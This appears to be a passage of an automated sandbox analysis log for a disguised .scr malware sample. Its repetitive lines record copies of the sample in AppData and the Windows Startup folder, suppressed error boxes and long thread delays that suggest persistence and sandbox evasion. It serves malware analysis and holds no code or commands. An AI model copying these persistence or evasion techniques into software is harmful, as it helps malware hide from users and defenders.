Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 6764; Thread sleep count: 1738 > 30
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 6764; Thread sleep count: 7970 > 30
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599406s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598605s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598373s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598259s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598141s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -598030s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597922s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597813s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597688s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597563s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597327s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596875s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596438s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -596094s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595746s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595637s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595516s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; TID: 2364; Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; TID: 7244; Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; TID: 7536; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; TID: 7732; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; TID: 7800; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599406
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599297
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598937
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598828
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598719
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598605
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598485
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598373
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598259
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598141
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 598030
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597922
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597813
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597688
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597563
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597438
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597327
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597219
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 597094
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596984
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596875
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596765
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596656
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596547
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596438
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596313
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596203
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 596094
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 595969
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 595860
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 595746
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 595637
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe; Thread delayed: delay time: 595516
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595406Jump to behavior
